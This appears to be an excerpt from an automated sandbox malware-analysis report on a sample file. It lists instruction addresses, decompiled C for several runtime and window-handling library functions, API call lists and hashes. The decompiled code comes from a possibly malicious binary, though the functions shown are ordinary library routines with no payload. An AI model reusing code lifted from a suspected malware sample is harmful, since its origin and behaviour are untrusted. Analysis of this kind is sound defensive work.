                                                                              0x0041a73a
                                                                              0x0041a73c
                                                                              0x0041a73e
                                                                              0x0041a750
                                                                              0x0041a750
                                                                              0x0041a755
                                                                              0x00000000
                                                                              0x0041a755
                                                                              0x0041a740
                                                                              0x0041a743
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a745
                                                                              0x0041a74a
                                                                              0x00000000
                                                                              0x0041a74a
                                                                              0x0041a70c
                                                                              0x0041a70f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a711
                                                                              0x0041a716
                                                                              0x00000000
                                                                              0x0041a716
                                                                              0x0041a6bd
                                                                              0x0041a5ae
                                                                              0x0041a5ae
                                                                              0x0041a5b5
                                                                              0x0041a5d8
                                                                              0x0041a5e0
                                                                              0x0041a5e7
                                                                              0x0041a5ee
                                                                              0x0041a758
                                                                              0x0041a75e
                                                                              0x0041a7f6
                                                                              0x0041a7fb
                                                                              0x0041a7fb
                                                                              0x0041a5f6
                                                                              0x0041a5fd
                                                                              0x0041a601
                                                                              0x0041a60f
                                                                              0x0041a617
                                                                              0x0041a61c
                                                                              0x0041a620
                                                                              0x0041a626
                                                                              0x0041a628
                                                                              0x0041a62f
                                                                              0x0041a62f
                                                                              0x0041a63d
                                                                              0x0041a644
                                                                              0x0041a644
                                                                              0x0041a648
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a65a
                                                                              0x0041a65a
                                                                              0x0041a778
                                                                              0x0041a77b
                                                                              0x0041a7bb
                                                                              0x0041a7bb
                                                                              0x0041a7be
                                                                              0x0041a7c0
                                                                              0x0041a7c0
                                                                              0x0041a7c6
                                                                              0x0041a7c9
                                                                              0x0041a7ce
                                                                              0x0041a7d0
                                                                              0x0041a7ee
                                                                              0x0041a7f3
                                                                              0x0041a7d2
                                                                              0x0041a7db
                                                                              0x0041a7e3
                                                                              0x0041a7e8
                                                                              0x0041a7e8
                                                                              0x00000000
                                                                              0x0041a7d0
                                                                              0x0041a77d
                                                                              0x0041a788
                                                                              0x0041a795
                                                                              0x0041a795
                                                                              0x0041a797
                                                                              0x0041a799
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a790
                                                                              0x0041a792
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a794
                                                                              0x0041a794
                                                                              0x0041a794
                                                                              0x0041a79b
                                                                              0x0041a79e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a7a0
                                                                              0x0041a7a8
                                                                              0x0041a7b5
                                                                              0x0041a7b5
                                                                              0x0041a7b7
                                                                              0x0041a7b9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a7b0
                                                                              0x0041a7b2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041a7b4
                                                                              0x0041a7b4
                                                                              0x0041a7b4
                                                                              0x00000000
                                                                              0x0041a7b5
                                                                              0x0041a5c2
                                                                              0x00000000
                                                                              0x0041a5c8
                                                                              0x0041a5c8
                                                                              0x0041a5cf
                                                                              0x0041a5d1
                                                                              0x0041a5d2
                                                                              0x0041a5d7
                                                                              0x00000000
                                                                              0x0041a5cf
                                                                              0x0041a5c2

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 0041A567
                                                                                • Part of subcall function 004148F8: EnterCriticalSection.KERNEL32(?,?,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00414920
                                                                              • _strlen.LIBCMT ref: 0041A5D9
                                                                              • _strcat.LIBCMT ref: 0041A5F6
                                                                              • _strncpy.LIBCMT ref: 0041A60F
                                                                                • Part of subcall function 00412A4D: __lock.LIBCMT ref: 00412A6B
                                                                                • Part of subcall function 00412A4D: RtlFreeHeap.NTDLL(00000000,?,0044BC58,0000000C,004148DC,00000000,0044BD10,00000008,00414911,?,?,?,00414733,00000004,0044BD00,00000010), ref: 00412AB2
                                                                              • GetTimeZoneInformation.KERNEL32(0045A778,0044CC10,00000018,0041AB69,0044CC20,00000008,00414469,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041A678
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0045A77C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 0041A706
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0045A7D0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 0041A73A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
                                                                              • String ID:
                                                                              • API String ID: 3757401926-0
                                                                              • Opcode ID: c4df148090271f23cdefc9380149ed533d56eb713fac5672326856388b27c59e
                                                                              • Instruction ID: 05c7c564470ca1ff3fdab3cffd2eb7c3de4044b1506a1426b00658f94c95b8da
                                                                              • Opcode Fuzzy Hash: c4df148090271f23cdefc9380149ed533d56eb713fac5672326856388b27c59e
                                                                              • Instruction Fuzzy Hash: 8071EB7050A3509FD721AB29EC45AD67BF5EB55321F24013BE064872E2D738C9D2CB6E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041AF17, Relevance: 12.2, APIs: 8, Instructions: 169COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E0041AF17(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				int _t96;
				void* _t98;
				short* _t99;

				_push(0x38);
				_push(0x44cc78);
				E00412BA4(__ebx, __edi, __esi);
				_t54 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t98 - 0x1c)) = _t54;
				 *(_t98 - 0x34) = 0;
				 *(_t98 - 0x44) = 0;
				_t81 =  *( *(_t98 + 0x14));
				 *(_t98 - 0x40) = _t81;
				 *(_t98 - 0x3c) = 0;
				_t56 =  *(_t98 + 8);
				if(_t56 ==  *(_t98 + 0xc)) {
					_t82 =  *(_t98 - 0x48);
					goto L31;
				} else {
					_t85 = _t98 - 0x30;
					if(GetCPInfo(_t56, _t98 - 0x30) != 0 &&  *(_t98 - 0x30) == 1 && GetCPInfo( *(_t98 + 0xc), _t98 - 0x30) != 0 &&  *(_t98 - 0x30) == 1) {
						 *(_t98 - 0x3c) = 1;
					}
					if( *(_t98 - 0x3c) == 0) {
						_t96 =  *(_t98 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E00411A30( *(_t98 + 0x10));
							_pop(_t85);
							_t96 = _t77 + 1;
							__eflags = _t96;
						} else {
							_t96 = _t81;
						}
						 *(_t98 - 0x38) = _t96;
					}
					if( *(_t98 - 0x3c) != 0) {
						L14:
						 *(_t98 - 4) = 0;
						E00412260(_t96 + _t96 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t98 - 0x18) = _t99;
						_t82 = _t99;
						 *(_t98 - 0x48) = _t82;
						E00412140(_t82, 0, _t96 + _t96);
						 *(_t98 - 4) =  *(_t98 - 4) | 0xffffffff;
						_t112 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t98 + 8), 1,  *(_t98 + 0x10),  *(_t98 - 0x40), _t82, _t96);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t98 - 0x44);
								if( *(_t98 - 0x44) != 0) {
									_push(_t82);
									E00412A4D();
								}
								_t57 =  *(_t98 - 0x34);
								goto L34;
							}
							__eflags =  *(_t98 + 0x18);
							if( *(_t98 + 0x18) == 0) {
								__eflags =  *(_t98 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t96);
									_push(1);
									_t69 = E004146EA(_t82, 0, _t96, __eflags);
									 *(_t98 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96, _t69, _t96, 0, 0);
										__eflags = _t70;
										if(_t70 != 0) {
											__eflags =  *(_t98 - 0x40) - 0xffffffff;
											if( *(_t98 - 0x40) != 0xffffffff) {
												 *( *(_t98 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t98 - 0x34));
											E00412A4D();
											 *(_t98 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t96 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96, 0, 0, 0, 0);
								__eflags = _t96;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96,  *(_t98 + 0x18),  *(_t98 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t98 - 0x34) =  *(_t98 + 0x18);
							}
							goto L31;
						} else {
							_push(_t96);
							_push(2);
							_t82 = E004146EA(_t82, 0, _t96, _t112);
							if(_t82 != 0) {
								 *(_t98 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t96 = MultiByteToWideChar( *(_t98 + 8), 1,  *(_t98 + 0x10), _t81, 0, 0);
						 *(_t98 - 0x38) = _t96;
						if(_t96 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E00412BDF(E00412FBB(_t57,  *((intOrPtr*)(_t98 - 0x1c))));
						}
						goto L14;
					}
				}
			}
















                                                                              0x0041af17
                                                                              0x0041af19
                                                                              0x0041af1e
                                                                              0x0041af23
                                                                              0x0041af28
                                                                              0x0041af2d
                                                                              0x0041af30
                                                                              0x0041af36
                                                                              0x0041af38
                                                                              0x0041af3b
                                                                              0x0041af3e
                                                                              0x0041af44
                                                                              0x0041b0bd
                                                                              0x00000000
                                                                              0x0041af4a
                                                                              0x0041af4a
                                                                              0x0041af59
                                                                              0x0041af74
                                                                              0x0041af74
                                                                              0x0041af7e
                                                                              0x0041af9a
                                                                              0x0041af80
                                                                              0x0041af83
                                                                              0x0041af8c
                                                                              0x0041af91
                                                                              0x0041af94
                                                                              0x0041af94
                                                                              0x0041af85
                                                                              0x0041af85
                                                                              0x0041af85
                                                                              0x0041af95
                                                                              0x0041af95
                                                                              0x0041afa0
                                                                              0x0041afbc
                                                                              0x0041afbc
                                                                              0x0041afc8
                                                                              0x0041afcd
                                                                              0x0041afd0
                                                                              0x0041afd2
                                                                              0x0041afdb
                                                                              0x0041afe3
                                                                              0x0041b000
                                                                              0x0041b002
                                                                              0x0041b022
                                                                              0x0041b02f
                                                                              0x0041b035
                                                                              0x0041b037
                                                                              0x0041b0c0
                                                                              0x0041b0c0
                                                                              0x0041b0c3
                                                                              0x0041b0c5
                                                                              0x0041b0c6
                                                                              0x0041b0cb
                                                                              0x0041b0cc
                                                                              0x00000000
                                                                              0x0041b0cc
                                                                              0x0041b03d
                                                                              0x0041b040
                                                                              0x0041b062
                                                                              0x0041b065
                                                                              0x0041b07d
                                                                              0x0041b07d
                                                                              0x0041b07e
                                                                              0x0041b080
                                                                              0x0041b087
                                                                              0x0041b08a
                                                                              0x0041b08c
                                                                              0x0041b098
                                                                              0x0041b09e
                                                                              0x0041b0a0
                                                                              0x0041b0b0
                                                                              0x0041b0b4
                                                                              0x0041b0b9
                                                                              0x0041b0b9
                                                                              0x0041b0a2
                                                                              0x0041b0a2
                                                                              0x0041b0a5
                                                                              0x0041b0ab
                                                                              0x0041b0ab
                                                                              0x0041b0a0
                                                                              0x00000000
                                                                              0x0041b08c
                                                                              0x0041b077
                                                                              0x0041b079
                                                                              0x0041b07b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041b07b
                                                                              0x0041b050
                                                                              0x0041b056
                                                                              0x0041b058
                                                                              0x0041b05d
                                                                              0x0041b05d
                                                                              0x00000000
                                                                              0x0041b004
                                                                              0x0041b004
                                                                              0x0041b005
                                                                              0x0041b00e
                                                                              0x0041b012
                                                                              0x0041b01b
                                                                              0x00000000
                                                                              0x0041b01b
                                                                              0x00000000
                                                                              0x0041b012
                                                                              0x0041afa2
                                                                              0x0041afb3
                                                                              0x0041afb5
                                                                              0x0041afba
                                                                              0x0041b014
                                                                              0x0041b014
                                                                              0x0041b0cf
                                                                              0x0041b0df
                                                                              0x0041b0df
                                                                              0x00000000
                                                                              0x0041afba
                                                                              0x0041afa0

                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(00000000,?,0044CC78,00000038,00419A97,?,00000000,00000000,004138C3,00000000,00000000,0044C670,0000001C,004135F2,00000001,00000020), ref: 0041AF55
                                                                              • GetCPInfo.KERNEL32(00000000,00000001), ref: 0041AF68
                                                                              • _strlen.LIBCMT ref: 0041AF8C
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,004138C3,?,00000000,00000000), ref: 0041AFAD
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Info$ByteCharMultiWide_strlen
                                                                              • String ID:
                                                                              • API String ID: 1335377746-0
                                                                              • Opcode ID: 31ddef11cf9d9292a321600743ccbdb7746488735481481bba84cbe39776b2c8
                                                                              • Instruction ID: 0ef00c97e67e07c099ff586f2ba3668a329117b7da0114417dcf0c045367667d
                                                                              • Opcode Fuzzy Hash: 31ddef11cf9d9292a321600743ccbdb7746488735481481bba84cbe39776b2c8
                                                                              • Instruction Fuzzy Hash: EA517B71801218EBCF21DF95ED849EFBFB8EF49354F24011AF825A2260D7758D91CBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042B32A, Relevance: 12.1, APIs: 8, Instructions: 134windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E0042B32A(void* __ebx, void* __ecx, void* __edi) {
				int _t24;
				intOrPtr _t27;
				void* _t30;
				intOrPtr _t31;
				struct HWND__* _t32;
				long _t33;
				struct HWND__* _t34;
				void* _t35;
				struct HWND__* _t36;
				struct HWND__* _t37;
				void* _t39;
				void* _t42;
				intOrPtr* _t47;
				intOrPtr _t49;
				void* _t55;
				struct HWND__* _t56;
				struct HWND__* _t58;
				struct HWND__* _t59;
				void* _t60;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr _t63;
				void* _t67;
				void* _t70;

				_t55 = __edi;
				_t42 = __ebx;
				E004128A0(E004313D6, _t67);
				_push(__ecx);
				_push(__ecx);
				_t47 = E00424440(0x10);
				 *((intOrPtr*)(_t67 - 0x14)) = _t47;
				_t24 = 0;
				 *(_t67 - 4) = 0;
				if(_t47 != 0) {
					_push( *((intOrPtr*)(_t67 + 0xc)));
					_push( *((intOrPtr*)(_t67 + 8)));
					_t24 = E004117D2(_t47);
				}
				 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t67 - 0x10)) = _t24;
				E004128BF(_t67 - 0x10, 0x452cbc);
				asm("int3");
				_t27 =  *((intOrPtr*)(_t47 + 0x74));
				if(_t27 == 0) {
					_t61 = E00408116();
					_t30 =  *((intOrPtr*)( *_t61 + 0x120))();
					_t49 = _t61;
					_t62 = _t60;
					if(_t30 != 0) {
						_push(_t62);
						_t63 = _t49;
						_t31 =  *((intOrPtr*)(_t63 + 0x60));
						if(_t31 == 0) {
							_t49 = _t63;
							_pop(_t62);
							goto L9;
						} else {
							if(_t31 != 0x3f107) {
								_t39 = E0042D179();
								_t31 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t39 + 4)))) + 0xac))( *((intOrPtr*)(_t63 + 0x60)), 1);
							}
							return _t31;
						}
					} else {
						L9:
						_push(_t49);
						_push(_t42);
						_push(_t67);
						_push(_t62);
						_push(_t55);
						 *((intOrPtr*)(_t70 + 0x10)) = _t49;
						_t32 = GetCapture();
						while(1) {
							_t56 = _t32;
							if(_t56 == 0) {
								break;
							}
							_t33 = SendMessageA(_t56, 0x365, 0, 0);
							if(_t33 == 0) {
								_t32 = E00427083(_t56);
								continue;
							}
							L25:
							return _t33;
							goto L31;
						}
						_t34 = GetFocus();
						while(1) {
							_t58 = _t34;
							if(_t58 == 0) {
								break;
							}
							_t33 = SendMessageA(_t58, 0x365, 0, 0);
							if(_t33 == 0) {
								_t34 = E00427083(_t58);
								continue;
							}
							goto L25;
						}
						_t35 = E004270C8( *((intOrPtr*)(_t70 + 0x10)));
						if(_t35 != 0) {
							_t36 =  *(_t35 + 0x1c);
						} else {
							_t36 = 0;
						}
						_t37 = GetLastActivePopup(_t36);
						while(1) {
							_t59 = _t37;
							_push(0);
							if(_t59 == 0) {
								break;
							}
							_t33 = SendMessageA(_t59, 0x365, 0, ??);
							if(_t33 == 0) {
								_t37 = E00427083(_t59);
								continue;
							}
							goto L25;
						}
						_t33 = SendMessageA( *( *((intOrPtr*)(_t70 + 0x14)) + 0x1c), 0x111, 0xe147, ??);
						goto L25;
					}
				} else {
					if(_t27 != 0x3f107) {
						return  *((intOrPtr*)( *_t47 + 0xac))(_t27, 1);
					}
					return _t27;
				}
				L31:
			}



























                                                                              0x0042b32a
                                                                              0x0042b32a
                                                                              0x0042b32f
                                                                              0x0042b334
                                                                              0x0042b335
                                                                              0x0042b33e
                                                                              0x0042b340
                                                                              0x0042b343
                                                                              0x0042b347
                                                                              0x0042b34a
                                                                              0x0042b34c
                                                                              0x0042b34f
                                                                              0x0042b352
                                                                              0x0042b352
                                                                              0x0042b357
                                                                              0x0042b35b
                                                                              0x0042b367
                                                                              0x0042b36c
                                                                              0x0042b36d
                                                                              0x0042b372
                                                                              0x0042b38d
                                                                              0x0042b393
                                                                              0x0042b39b
                                                                              0x0042b39d
                                                                              0x0042b39e
                                                                              0x0042b92b
                                                                              0x0042b92c
                                                                              0x0042b92e
                                                                              0x0042b933
                                                                              0x0042b955
                                                                              0x0042b957
                                                                              0x00000000
                                                                              0x0042b935
                                                                              0x0042b93a
                                                                              0x0042b93c
                                                                              0x0042b94d
                                                                              0x0042b94d
                                                                              0x0042b954
                                                                              0x0042b954
                                                                              0x0042b3a0
                                                                              0x0042b88d
                                                                              0x0042b88d
                                                                              0x0042b88e
                                                                              0x0042b88f
                                                                              0x0042b890
                                                                              0x0042b891
                                                                              0x0042b892
                                                                              0x0042b896
                                                                              0x0042b8bb
                                                                              0x0042b8bb
                                                                              0x0042b8bf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b8af
                                                                              0x0042b8b3
                                                                              0x0042b8b6
                                                                              0x00000000
                                                                              0x0042b8b6
                                                                              0x0042b925
                                                                              0x0042b92a
                                                                              0x00000000
                                                                              0x0042b92a
                                                                              0x0042b8c1
                                                                              0x0042b8d9
                                                                              0x0042b8d9
                                                                              0x0042b8dd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b8cd
                                                                              0x0042b8d1
                                                                              0x0042b8d4
                                                                              0x00000000
                                                                              0x0042b8d4
                                                                              0x00000000
                                                                              0x0042b8d1
                                                                              0x0042b8e3
                                                                              0x0042b8ea
                                                                              0x0042b8f0
                                                                              0x0042b8ec
                                                                              0x0042b8ec
                                                                              0x0042b8ec
                                                                              0x0042b8f4
                                                                              0x0042b90b
                                                                              0x0042b90b
                                                                              0x0042b90f
                                                                              0x0042b910
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b8ff
                                                                              0x0042b903
                                                                              0x0042b906
                                                                              0x00000000
                                                                              0x0042b906
                                                                              0x00000000
                                                                              0x0042b903
                                                                              0x0042b923
                                                                              0x00000000
                                                                              0x0042b923
                                                                              0x0042b374
                                                                              0x0042b379
                                                                              0x00000000
                                                                              0x0042b380
                                                                              0x0042b386
                                                                              0x0042b386
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042B32F
                                                                                • Part of subcall function 004117D2: __EH_prolog.LIBCMT ref: 004117D7
                                                                              • GetCapture.USER32 ref: 0042B896
                                                                              • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0042B8AF
                                                                              • GetFocus.USER32 ref: 0042B8C1
                                                                              • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0042B8CD
                                                                              • GetLastActivePopup.USER32(?), ref: 0042B8F4
                                                                              • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0042B8FF
                                                                              • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0042B923
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$H_prolog$ActiveCaptureFocusLastPopup
                                                                              • String ID:
                                                                              • API String ID: 2915395904-0
                                                                              • Opcode ID: b62ee04c23a13f0bd83a9e0e49ecaf945f0d50509f571791ea39a6503b8646e5
                                                                              • Instruction ID: 26e2887db0a61a0bb4f3fdb75b2b2bcb1c5cde77713997e6556b935bb4b12a92
                                                                              • Opcode Fuzzy Hash: b62ee04c23a13f0bd83a9e0e49ecaf945f0d50509f571791ea39a6503b8646e5
                                                                              • Instruction Fuzzy Hash: 84410D70700229ABCB14AB76EC44E7F7BADEF45380B50442FF501D7281DBA9CC4146E9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004177D7, Relevance: 12.1, APIs: 8, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 98%
                                                                              			E004177D7() {
				int _v4;
				int _v8;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t29;
				void* _t34;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x45a720; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					if(_t7 != 1) {
						if(_t7 == _t38 || _t7 == _t29) {
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							if(_t37 == _t29) {
								goto L20;
							}
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E00412247(_t8 - _t37 + 1);
								if(_t34 != _t29) {
									E00411AC0(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
							} while ( *_t8 != _t29);
							goto L25;
						} else {
							L20:
							return 0;
						}
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E00412247(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									if(WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29) == 0) {
										_push(_v8);
										E00412A4D();
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					if(GetLastError() != 0x78) {
						_t7 =  *0x45a720; // 0x1
					} else {
						_t7 = _t38;
						 *0x45a720 = _t7;
					}
					goto L6;
				} else {
					 *0x45a720 = 1;
					goto L7;
				}
			}

















                                                                              0x004177d9
                                                                              0x004177e8
                                                                              0x004177ea
                                                                              0x004177f0
                                                                              0x004177f1
                                                                              0x00417820
                                                                              0x00417823
                                                                              0x004178a4
                                                                              0x004178ae
                                                                              0x004178b4
                                                                              0x004178b8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004178bc
                                                                              0x004178c8
                                                                              0x004178cb
                                                                              0x004178d3
                                                                              0x004178d8
                                                                              0x004178e1
                                                                              0x004178da
                                                                              0x004178da
                                                                              0x004178da
                                                                              0x004178ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004178be
                                                                              0x004178be
                                                                              0x004178be
                                                                              0x004178be
                                                                              0x004178bf
                                                                              0x004178c3
                                                                              0x004178c4
                                                                              0x00000000
                                                                              0x004178aa
                                                                              0x004178aa
                                                                              0x00000000
                                                                              0x004178aa
                                                                              0x004178a4
                                                                              0x00417825
                                                                              0x00417827
                                                                              0x00417831
                                                                              0x00417834
                                                                              0x00417836
                                                                              0x00417846
                                                                              0x00417854
                                                                              0x00417859
                                                                              0x0041785f
                                                                              0x00417863
                                                                              0x00417866
                                                                              0x0041786e
                                                                              0x00417872
                                                                              0x00417883
                                                                              0x00417885
                                                                              0x00417889
                                                                              0x0041788f
                                                                              0x0041788f
                                                                              0x00417893
                                                                              0x00417893
                                                                              0x00417872
                                                                              0x00417898
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417838
                                                                              0x00417838
                                                                              0x00417838
                                                                              0x00417838
                                                                              0x0041783a
                                                                              0x0041783f
                                                                              0x00417841
                                                                              0x00000000
                                                                              0x00417838
                                                                              0x0041782b
                                                                              0x0041782f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041782f
                                                                              0x004177f5
                                                                              0x004177f9
                                                                              0x00417810
                                                                              0x0041781b
                                                                              0x00417812
                                                                              0x00417812
                                                                              0x00417814
                                                                              0x00417814
                                                                              0x00000000
                                                                              0x004177fb
                                                                              0x004177fb
                                                                              0x00000000
                                                                              0x004177fb

                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32(74B04DE0,00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 004177F3
                                                                              • GetLastError.KERNEL32(?,?,?,?,00412E73,?,0044BC68,00000060), ref: 00417807
                                                                              • GetEnvironmentStringsW.KERNEL32(74B04DE0,00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 00417829
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,74B04DE0,00000000,?,?,?,?,00412E73), ref: 0041785D
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 0041787F
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 00417898
                                                                              • GetEnvironmentStrings.KERNEL32(74B04DE0,00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 004178AE
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004178EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 883850110-0
